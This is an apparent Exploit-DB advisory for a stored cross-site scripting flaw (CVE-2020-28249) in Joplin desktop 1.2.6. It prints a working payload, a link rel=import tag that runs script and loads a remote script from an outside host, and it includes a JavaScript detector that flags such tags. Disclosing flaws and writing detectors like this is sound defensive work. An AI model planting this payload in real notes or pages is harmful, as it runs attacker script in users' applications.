Vendor: Joplin
By: Philip Holbrook
CVSS: 6.1 (MEDIUM)
CWE: 79 (Cross Site Scripting)
Product Name: Joplin
Affected Version From: 1.2.6
Affected Version To: 1.2.6
Patch Exists: YES
Related CVE: CVE-2020-28249
CPE: a:laurent_22:joplin:1.2.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows, Mac
2020

Joplin 1.2.6 – ‘link’ Cross Site Scripting

An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter. The payload for the exploit is `<link rel=import href="data:text/html&comma;<script>alert(XSS)<&sol;script> <script src="//brutelogic.com.br&sol;1.js&num; </script>`

Mitigation:

Ensure that all user-supplied input is properly sanitized and filtered before being used in the application.
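A detection-side check for the pattern described above, as an added example that is not part of the original advisory or Joplin's code base: it scans a note body for `<link>` tags, decodes character references in their attributes the way a renderer would, and flags `rel=import` or an `href` with a script-capable scheme. The function names, the entity subset and the benign sample note are assumptions made for this sketch.

```javascript
// Added example (not Joplin code). NAMED is a subset of HTML named character references.
const NAMED = new Map(Object.entries({ comma: ',', sol: '/', num: '#', colon: ':', amp: '&', lt: '<', gt: '>', quot: '"' }));
function decodeEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));/gi, (m, hex, dec, name) => {
    if (name) return NAMED.get(name) ?? m;
    const cp = hex ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}
// Read attributes from index i (just past "<link") up to ">". A quoted value runs to the
// next matching quote or end of input, so it can swallow markup, as the PoC's href does.
function parseAttrs(src, i) {
  const attrs = Object.create(null);
  while (i < src.length && src[i] !== '>') {
    if (/[\s/]/.test(src[i])) { i++; continue; }
    let start = i, value = '';
    while (i < src.length && !/[\s=>/]/.test(src[i])) i++;
    const name = src.slice(start, i).toLowerCase();
    while (/\s/.test(src[i] || '')) i++;
    if (src[i] === '=') {
      do { i++; } while (/\s/.test(src[i] || ''));
      if (src[i] === '"' || src[i] === "'") {
        const end = src.indexOf(src[i], i + 1), stop = end === -1 ? src.length : end;
        [value, i] = [src.slice(i + 1, stop), stop + 1];
      } else {
        for (start = i; i < src.length && !/[\s>]/.test(src[i]); i++);
        value = src.slice(start, i);
      }
    }
    if (name && !(name in attrs)) attrs[name] = decodeEntities(value);
  }
  return attrs;
}
// Flag <link> tags; whitespace/control chars are stripped before the scheme check.
function findRiskyLinkTags(noteBody) {
  const findings = [], tagRe = /<link(?=[\s/>])/gi;
  for (let m; (m = tagRe.exec(noteBody)) !== null; ) {
    const attrs = parseAttrs(noteBody, m.index + m[0].length);
    const href = attrs.href || '', reasons = [];
    const scheme = /^(data|javascript|vbscript):/.exec(href.replace(/[\x00-\x20]/g, '').toLowerCase());
    if ((attrs.rel || '').toLowerCase().split(/\s+/).includes('import')) reasons.push('rel=import');
    if (scheme) reasons.push('href scheme ' + scheme[1] + ':');
    if (reasons.length) findings.push({ offset: m.index, href, reasons });
  }
  return findings;
}
const POC = '<link rel=import\nhref="data:text/html&comma;<script>alert(XSS)<&sol;script>\n<script src="//brutelogic.com.br&sol;1.js&num; </script>'; // payload from this page
const BENIGN = 'See <a href="https://joplinapp.org/">docs</a> <link rel="stylesheet" href="note.css">'; // constructed
console.log(findRiskyLinkTags(POC), findRiskyLinkTags(BENIGN));
```

The decoded `href` in the finding shows what the renderer receives once `&comma;` and `&sol;` are resolved, which is why the check runs after entity decoding rather than on the raw note text.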

Exploit-DB raw data:

# Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting
# Date: 2020-09-21
# Exploit Author: Philip Holbrook (@fhlipZero)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
# Version: 1.2.6
# Tested on: Windows / Mac
# CVE : CVE-2020-28249
# References:
# https://github.com/fhlip0/JopinXSS/blob/main/readme.md

# 1. Technical Details
# An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter

# 2. PoC
# Paste the following payload into a note:

```
<link rel=import
href="data:text/html&comma;<script>alert(XSS)<&sol;script>
<script src="//brutelogic.com.br&sol;1.js&num; </script>
```